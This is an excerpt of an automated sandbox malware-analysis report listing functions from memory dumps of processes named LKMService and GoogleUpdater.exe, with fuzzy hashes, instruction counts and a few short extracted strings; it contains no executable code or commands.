Instruction Fuzzy Hash: B1020171B003558FCB55CFB9D8D469EBBE2AF89300B5581BAE409EB362DB749C46CB40

Function 009E0A81 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b729d291ef701734475404376d4e946c9b7319b95923f78dd7ab3d33c0486411
Instruction ID: 85aa43d1f9dcdd3e0736a06142f6f33412c9349576a7359ea54c3772e4c2fc92
Opcode Fuzzy Hash: b729d291ef701734475404376d4e946c9b7319b95923f78dd7ab3d33c0486411
Instruction Fuzzy Hash: 82A1E171B103598FCB15DF79D8D069DBBB2AF99300F55816AE009EB362EB74AC49CB40

Function 009E9028 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8444e207e4785f095c1d4a33d03e12a72e93bd47b44a654e7a381c0505b7c98b
Instruction ID: 046519279a951cc8779b8df03541ab03ea292dec7de6a2a2bc105ee648f2d060
Opcode Fuzzy Hash: 8444e207e4785f095c1d4a33d03e12a72e93bd47b44a654e7a381c0505b7c98b
Instruction Fuzzy Hash: 6E315C77F105394B8714CEAEDC901AEB2E6AB8426070A813ADC46FB751DA74CC09C7D0

Function 009EE100 Relevance: 1.5, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%A?T, xrefs: 009EE1E6

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: %A?T
API String ID: 0-4079540278
Opcode ID: b064dd8dc5f2fb89a18dbf3d1f9b91ef6d50805ac42b49185a6456030e959d8a
Instruction ID: 92fe225e43c5c1eecacca9152f6f4beb57e0b757292ec817a0050a4ff5ce9ab9
Opcode Fuzzy Hash: b064dd8dc5f2fb89a18dbf3d1f9b91ef6d50805ac42b49185a6456030e959d8a
Instruction Fuzzy Hash: 35711531F001548FCB19EBAAC89449EBBF6AFC93107294069D909EB366CB349D05CBA1

Function 009E8D68 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~t, xrefs: 009E8D97

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: t~t
API String ID: 0-1248721091
Opcode ID: 44ed23f64e2e986b96481053c0ec89688f2a228b8de89d09f059f1d8b55ed96c
Instruction ID: 820d4d045ff4dfd20aafa1ac821e9d4fb841241c1cf05b604f98f0e1f68d56b0
Opcode Fuzzy Hash: 44ed23f64e2e986b96481053c0ec89688f2a228b8de89d09f059f1d8b55ed96c
Instruction Fuzzy Hash: 60418034B00745CFCB19DFA9C49495EBBB2FF89310B148569E809AB362DB75EC42CB80

Function 009EBE08 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

t~t, xrefs: 009EBE57

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: t~t
API String ID: 0-1248721091
Opcode ID: b7877936f27ece95b309cc3fa05e8f3f83d9b63ce3749f65766a06d22a5458e7
Instruction ID: a8d8698780536c4ecb24003ff1c2235b7138bec7935f8b875f83c0aa3c73fd2e
Opcode Fuzzy Hash: b7877936f27ece95b309cc3fa05e8f3f83d9b63ce3749f65766a06d22a5458e7
Instruction Fuzzy Hash: 5201C075B052848FCB16DB69D8518AFBBB6BFCA314B1444BAD408E7362DB319C45CBE0

Function 009EBE18 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

t~t, xrefs: 009EBE57

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: t~t
API String ID: 0-1248721091
Opcode ID: 4da8578995bc6c5997ff63e242762bb7639b9f7c95a7db7918c3f54294a0b0cc
Instruction ID: d6963d0c7df86243e0b3ed1f894992b80507e2e8c532b504b346cf604e35af05
Opcode Fuzzy Hash: 4da8578995bc6c5997ff63e242762bb7639b9f7c95a7db7918c3f54294a0b0cc
Instruction Fuzzy Hash: EB017C75B002148F8B19DBAAD8419AFB7B6FBC9320B104579E918A7351DB31AC41CBD0

Function 009EEC0F Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d2c5463219761e391c5c50148e092ad684425f706ce02078cad7838ccf2602
Instruction ID: fe2e91b217f2f5d281face2727baec9543e223ee99720813e13e992e3a2c8768
Opcode Fuzzy Hash: 24d2c5463219761e391c5c50148e092ad684425f706ce02078cad7838ccf2602
Instruction Fuzzy Hash: 1F613B31304284DFDB16DF29C890BAE7BA2EF85310F14846EE5568B392DB76EC46CB50

Function 009EEC75 Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4193cf0b87c1c0fa4d25172475c74a941bed3cff68dbb3b56811fd8ab72cfc8
Instruction ID: 19419107085b47583c563efb74d26150e6742bd8ee1f4bddb393123e3ae85fd6
Opcode Fuzzy Hash: a4193cf0b87c1c0fa4d25172475c74a941bed3cff68dbb3b56811fd8ab72cfc8
Instruction Fuzzy Hash: F051C331300244DFEB16DF29C894BAE77A2EF84310F14886DE55A9B392DB76EC46CB50

Function 009EEF90 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4196ad00fa78c99bea23d177cdae4498b5e7e03b147c8e5f709b0db0962f852
Instruction ID: aac63050601007a7e3586f63fe823ab8179cad7495aefc246d42edb9e4861441
Opcode Fuzzy Hash: d4196ad00fa78c99bea23d177cdae4498b5e7e03b147c8e5f709b0db0962f852
Instruction Fuzzy Hash: 0F61B5313002449FEB1A9F65C854B6E77A6EFC8310F14846DE91A9B396DF75EC02CB90

Function 009ECC88 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af05ece7d0a692ef2af5881b31cd3a1dc8560ee9cf7963fb96693ca85fbfd23
Instruction ID: 377654398402b190ea7f260e9319e5b7dafbd373f32cb3cc382b68c1f3ae41ef
Opcode Fuzzy Hash: 8af05ece7d0a692ef2af5881b31cd3a1dc8560ee9cf7963fb96693ca85fbfd23
Instruction Fuzzy Hash: 9741E4663083D44FC71AA33D6C2406D7F96CEC262131948BFE18EDB283CE199D0783A6

Function 009EAB78 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d83fe51cc4993dd0150594d174de20eed46d9e37691ef8cd6392d2b3abaa32
Instruction ID: f2fa0f4eb894f5949325c32b0c497d0375a6dcfcdae3a8d67790ddc93b665cc7
Opcode Fuzzy Hash: 52d83fe51cc4993dd0150594d174de20eed46d9e37691ef8cd6392d2b3abaa32
Instruction Fuzzy Hash: 6D412872E002688FDB05DF59D88479DBAF6AB88310F254156D901BB3A0CB75AC44CBD0

Function 009E8E35 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98ee94297563cf5557f0a14d147879ca71bdd8229cf3daea7defbb9bda827a5
Instruction ID: 0419422b8739267ab282a48dee4b01842cd56f219b98e55c434b0eb1f68c08be
Opcode Fuzzy Hash: e98ee94297563cf5557f0a14d147879ca71bdd8229cf3daea7defbb9bda827a5
Instruction Fuzzy Hash: 2B412E34A10649CFCB19DFA9C484A5EBBB2BF98314F148469E5099B361DB75EC86CB40

Function 009EA161 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38795d185f70942c1747cec574669d0ba2f189dde3f1f2f44ea00b3dac20537a
Instruction ID: 71795e3c632d53264d70d655d7729165d4aa63c83e555a58e297777607b1d463
Opcode Fuzzy Hash: 38795d185f70942c1747cec574669d0ba2f189dde3f1f2f44ea00b3dac20537a
Instruction Fuzzy Hash: B9313873E012659FCB159FB89804499BBB2BB8532035A82BEEC05E7751C73ADC51CBC0

Function 009EA170 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e7445434d053f62378b3cc73d2bf82a9ba70e01ae34f9ce25152a1fe2770dd
Instruction ID: 44b183cf87db886d8c21e1c06db50b283326ae248e0c94ee0577ed6f4ee29bad
Opcode Fuzzy Hash: 77e7445434d053f62378b3cc73d2bf82a9ba70e01ae34f9ce25152a1fe2770dd
Instruction Fuzzy Hash: B5212673E016299B8B059EB9D80449AB7B2BB8536035A82ADEC09F7750C77ADC41CBC0

Function 009EC450 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4914e1b34ac3a5537d2e65095d750ad88dbdea092c3059f5725032d16f240a
Instruction ID: acbecffc90a8ff76e78573eb78b0041e7837422887b3dd2b45d9e8c860b5d908
Opcode Fuzzy Hash: be4914e1b34ac3a5537d2e65095d750ad88dbdea092c3059f5725032d16f240a
Instruction Fuzzy Hash: FF21F7B190C3D58FCB16CB69DC644BE7BB4AF45300F1405AAE481AB2A2D7349C06C7A1

Function 009EE0F2 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5e905346e4c51821e7f764757bedd2a6f9ac8570f6a810583b75fee2d6d23f
Instruction ID: c6edaca64e855a8f55c2874c7d6dcdaaddfa317cc0bb7128ec728d93c36d80dd
Opcode Fuzzy Hash: 8b5e905346e4c51821e7f764757bedd2a6f9ac8570f6a810583b75fee2d6d23f
Instruction Fuzzy Hash: 5821C731F04158CF8B15DBBAD89589DBBF6BF893107654469E905FB321CB359C40CBA1

Function 009ECCE0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04afdd2fcc037700d755466d350646db97fa16df4e0f40594c644762f6052f9d
Instruction ID: b0a5348602ad2b5155eed65918109647871e73b306ebce3f2d60fcd4b883885f
Opcode Fuzzy Hash: 04afdd2fcc037700d755466d350646db97fa16df4e0f40594c644762f6052f9d
Instruction Fuzzy Hash: 410175A73401A5574A5A727E385157E228BCBC667235C047EF29DEB382CE1A9D0703E6

Function 009EAEB0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bab2f44174d1d9d1c96210dba9b21ed4d32f93b52fc819dfd1030002e29f9b8
Instruction ID: b96a588a47166916bb36edf655e323c21944a9e3116c4010dfaa416aba2e748f
Opcode Fuzzy Hash: 8bab2f44174d1d9d1c96210dba9b21ed4d32f93b52fc819dfd1030002e29f9b8
Instruction Fuzzy Hash: 81118E36B212258F8754DF7DC89495ABBF6AF8921531640B9E906EB371EB30EC01CB90

Function 009ED6C8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cace08530cdcbf418f63346faeb45ef269d9e6529f43366ce42ed8e283bd4d
Instruction ID: a0307047c365f85b5498efc7ef41117131b1a6c6aeb39ce2b6d121f51010d063
Opcode Fuzzy Hash: d3cace08530cdcbf418f63346faeb45ef269d9e6529f43366ce42ed8e283bd4d
Instruction Fuzzy Hash: 9811AD353042909FC3419B69D84485ABBA6EFC672030684BAE548CB362CA61EC02CBA1

Function 009EC480 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160ea60fea64345e56d2530d0530efd779db53b46213cc2364fbcae86cf39ab4
Instruction ID: fea9e23bc47821bcf2d3ae11c6ae667a8cbffa86c3ccf66e02a1f1006ca9e01c
Opcode Fuzzy Hash: 160ea60fea64345e56d2530d0530efd779db53b46213cc2364fbcae86cf39ab4
Instruction Fuzzy Hash: 5011E3B1E04169DBCF15DBAAD8449BFB7B9FB84350F100929E951AB390DB709D02CBD1

Function 0073D201 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4657277683.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_73d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8d2e21fa2e56df04f4fc84e14f5f4fd3939e794e17e2e5975b8cbbc35f7995
Instruction ID: fe02765b64f37e034555cde88a49bc945661ac3fbba88b5d6eea4a4976092fe4
Opcode Fuzzy Hash: cc8d2e21fa2e56df04f4fc84e14f5f4fd3939e794e17e2e5975b8cbbc35f7995
Instruction Fuzzy Hash: 9C01F2714093449AF7208A65E984B27FF98FF81764F18841AED081A293C7BCDC40C6B1

Function 009EBD20 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7c1827d0b28d56c58447912acfc58977718455e055184fb97faf327f977398
Instruction ID: 39cdbf0e56fb1eebae13e28946ef734db28f8ac00fc62cb74356e1a020710084
Opcode Fuzzy Hash: 2f7c1827d0b28d56c58447912acfc58977718455e055184fb97faf327f977398
Instruction Fuzzy Hash: EBF0FF353052948FC3168B2EDC549567BF9EF8A72532A84AAE545CB376C730EC81C751

Function 0073D200 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4657277683.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_73d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f4cc7ec5643ad0d7a7656318a63e002844a03274c670d6fd97f1d157607dd1
Instruction ID: 1e0a6be3898e5c36a19887d4c6fdc09ac60b3676c54ae8e76f19a23df3bc7b1c
Opcode Fuzzy Hash: a3f4cc7ec5643ad0d7a7656318a63e002844a03274c670d6fd97f1d157607dd1
Instruction Fuzzy Hash: CAF0C2724053449AF7208A05D984B63FF98EB91724F18C45AED080F293C3789C44CB71

Function 009EBD30 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283f8b27e915754a1cbe1d204f832b00b4fddabd9f88862a6ddb0d79bcc98ea5
Instruction ID: a0de20f7662a6905d4e6f9d3f652ab10830e44ad666f3dc27b72a3d1ae9ee897
Opcode Fuzzy Hash: 283f8b27e915754a1cbe1d204f832b00b4fddabd9f88862a6ddb0d79bcc98ea5
Instruction Fuzzy Hash: 8CF0BD35300554CFC3199B6EC844C16B7E9EFC976532685A9D609CB775CB70DC81C750

Function 009ED941 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1beebfb76cbcf3512647746d288e20accc8c8458f2cc36ad43ea732ccafc632
Instruction ID: 10c3dacf4d56b4ed3f70a585f895f4103948e2126a5b9c98d512296a31a40339
Opcode Fuzzy Hash: e1beebfb76cbcf3512647746d288e20accc8c8458f2cc36ad43ea732ccafc632
Instruction Fuzzy Hash: 72F082302067408FC3669B79C815565BBF6EF8A32135484BEE449DB772CE35EC45C790

Function 009ECC79 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdeb71493c78bdb628290c892036eb67845dfc9a9ec1ae44e65b5970425dfb02
Instruction ID: a1c0466ea8fb516831e2a5467a1bf4c49a191dbd636ab73d9a017051974250c2
Opcode Fuzzy Hash: bdeb71493c78bdb628290c892036eb67845dfc9a9ec1ae44e65b5970425dfb02
Instruction Fuzzy Hash: A4E0DF31108790AFC717976EEC1488BBFA9CDC2720314CAAFE18D87522DEA56C0683A1

Function 009ED708 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56ccb673211bdfbd6762de675b7dc8684878b366a92a53cf111ca413aa2f67c9
Instruction ID: d3333ec02fd3e65733f3214b6cae5145ab94f2f78b3fec604b2197d9ee7145b4
Opcode Fuzzy Hash: 56ccb673211bdfbd6762de675b7dc8684878b366a92a53cf111ca413aa2f67c9
Instruction Fuzzy Hash: B3E0ED753605209F83489B6DD445C1D73EAEFC9B7531142AAF519CB3B2CE61DC018BD1

Function 009ED710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0798ae11a080aba5b5dcdaede50c44cd46db89f58e7b65e7d9d756f0b74ce03
Instruction ID: bc3d6e24bf9867f7e6e8ebc14c4100a2c8b8f9bbe4c040810888651d29043a6b
Opcode Fuzzy Hash: d0798ae11a080aba5b5dcdaede50c44cd46db89f58e7b65e7d9d756f0b74ce03
Instruction Fuzzy Hash: 87E04F353100209F8344EB6ED444C19B3EAEFC9B2131140BAF509CB332CE61EC018BD1

Function 009ECF48 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
Instruction ID: 871708be24fbc4908398b69efd551809693d5e107a0e1557f2aa692bef97404a
Opcode Fuzzy Hash: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
Instruction Fuzzy Hash: ECE04F357006108F8726AB3AD45191A73EBAFCE32135404BDE10ACBB62CE32EC42CBD0

Function 009ED950 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f7cbf2ced0bcb2553bc6537befca9aa7ffd2ab8d52d2d091a8097bdea3c74d
Instruction ID: 102817d5983f0e90fb143ac9eeb39c6b342fd7f44670a18c31e3e4f39007680e
Opcode Fuzzy Hash: f5f7cbf2ced0bcb2553bc6537befca9aa7ffd2ab8d52d2d091a8097bdea3c74d
Instruction Fuzzy Hash: AFE0E5346016108FC369AB39D405916B7E6AF8A32535044BDE40A8BB62CB32EC41CB80

Function 009E0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253cc26d0cac3377d79909c97177c9b4df2b1c071999f0bc0a0c91bd66be3509
Instruction ID: 50a0658bf4db3b0ecad920c24313752ab38a7ced71a24d28ebb7f8b39ba32d8b
Opcode Fuzzy Hash: 253cc26d0cac3377d79909c97177c9b4df2b1c071999f0bc0a0c91bd66be3509
Instruction Fuzzy Hash: F1D0C734A00208EF8B04DFB4D94566CB7BAEB89300B0080B9E50AE7200EB351E01AB40

Function 009ED690 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c78c44d64bd14c757d204808b0fbd3acaca722eab83fc3580ab8cead069848
Instruction ID: bf92b59119f7a879cec05de9dcc3f0722cd3695b307eb0305da903c35377d667
Opcode Fuzzy Hash: 93c78c44d64bd14c757d204808b0fbd3acaca722eab83fc3580ab8cead069848
Instruction Fuzzy Hash: B6D05E343006108F8B45AB69D405819B7EAEF8D62531040A9E809CB722DE32EC028BD4

Function 009ECFA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba3798b4b99cf65727c8a1573092afb2df2b1c9152ce4f83e2c996730fc8b5e
Instruction ID: 10ebc998c3b4ba3993ca5c4ab542d86f38770a75563a6a7b73e6f1ba9c5dc8de
Opcode Fuzzy Hash: eba3798b4b99cf65727c8a1573092afb2df2b1c9152ce4f83e2c996730fc8b5e
Instruction Fuzzy Hash: F0D09E752183848FD311C758E858C61BFA9DB4961071A81EAE948CB3B7D634EC14CA55

Function 009ECFB0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44

Non-executed Functions

Function 009EEA63 Relevance: 5.1, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

q, xrefs: 009EEAFA
q, xrefs: 009EEAEA
q, xrefs: 009EEA92
q, xrefs: 009EEA82

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: q$q$q$q
API String ID: 0-594874556
Opcode ID: e4b754f6f7423ddd09e42774b73b565f141c56c262a99254c38abb0478583054
Instruction ID: d890e4a7b8506d170a88e8e640fabfc25a536edd430a44c503b5e5c06319d467
Opcode Fuzzy Hash: e4b754f6f7423ddd09e42774b73b565f141c56c262a99254c38abb0478583054
Instruction Fuzzy Hash: 11319E26E4C2C25BD307746D28621FE3B5A5972370F4401ABDC85DF3D3E5068C9B13A5

Analysis Process: GoogleUpdater.exePID: 1032, Parent PID: 800COMMON

Execution Graph

Execution Coverage:	31%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 01201098 Relevance: 12.4, Strings: 4, Instructions: 7414COMMON

Download Yara Rule

Strings

&03, xrefs: 012024ED
9!7J, xrefs: 0120741B
j'R, xrefs: 0120414F
;.%, xrefs: 01204C97

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: 3a2baa96c9d2b2119c90e5c90fa34f09091ccd4990367214c2c8b14bc375b03c
Instruction ID: 19e73e289b418fac419b95e892669840318cfef7deae85e47ccce3abf6b186a7
Opcode Fuzzy Hash: 3a2baa96c9d2b2119c90e5c90fa34f09091ccd4990367214c2c8b14bc375b03c
Instruction Fuzzy Hash: 6FE31B75E112298FDB64DF68C890A9DB7B6BB88300F5145E9E809F7351DB31AE81CF90

Function 0120B7B8 Relevance: 2.9, Strings: 2, Instructions: 391
COMMON

